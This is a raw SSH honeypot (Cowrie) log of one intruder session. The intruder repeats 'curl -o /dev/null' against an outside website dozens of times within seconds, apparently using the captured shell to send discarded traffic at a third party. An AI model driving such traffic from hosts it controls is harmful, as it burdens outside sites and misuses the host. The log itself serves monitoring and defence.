{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:37.688295Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:37.725914Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:37.726826Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:37.764339Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:37.765172Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:37.803145Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:37.803990Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:37.843217Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:37.844326Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:37.882341Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:37.883240Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:37.923401Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:37.924164Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:37.961826Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:37.962813Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:38.008638Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:38.009419Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:38.048389Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:38.049199Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:38.091511Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:38.092402Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:38.130327Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:38.131185Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:38.174241Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:38.175194Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:38.216752Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:38.217552Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:38.257462Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:38.258584Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:38.295830Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:38.297380Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:38.336639Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:38.337670Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:38.374886Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:38.375803Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:38.413134Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:38.414268Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:38.451756Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:38.452773Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:38.490853Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:38.491671Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:38.527992Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:38.529196Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:38.567515Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:38.568507Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:38.605849Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:38.606883Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:38.644828Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:38.645834Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:38.683626Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:38.684607Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:38.722334Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:38.723153Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:38.760360Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:38.761207Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:38.800198Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:38.801203Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:38.840522Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:38.841729Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:38.880729Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:38.881749Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:38.924490Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:38.925553Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:38.963436Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:38.964903Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:39.001623Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:39.002756Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:39.041948Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:39.043032Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:39.080985Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:39.082052Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:39.118930Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:39.119992Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:39.158990Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:39.160083Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:39.199091Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:39.200147Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:39.237494Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:39.238498Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:39.277668Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:39.278937Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:39.316269Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:39.317121Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:39.361027Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:39.361881Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:39.399399Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:39.400419Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:39.440606Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:39.441664Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:39.481467Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:39.482398Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:39.519989Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:39.521013Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:39.564225Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:39.565279Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:39.602880Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:39.603860Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:39.641446Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:39.642408Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:39.684031Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:39.685050Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:39.721611Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:39.722414Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:39.762011Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:39.763087Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:39.801299Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:39.802338Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:39.839304Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:39.840455Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:39.878124Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:39.879200Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:39.916896Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:39.917865Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:39.957544Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:39.958881Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:40.001660Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:40.002738Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:40.039772Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:40.040627Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:40.079453Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:40.080472Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:40.117892Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:40.118939Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:40.156015Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:40.157033Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:40.194805Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:40.195844Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:40.233755Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:40.234814Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
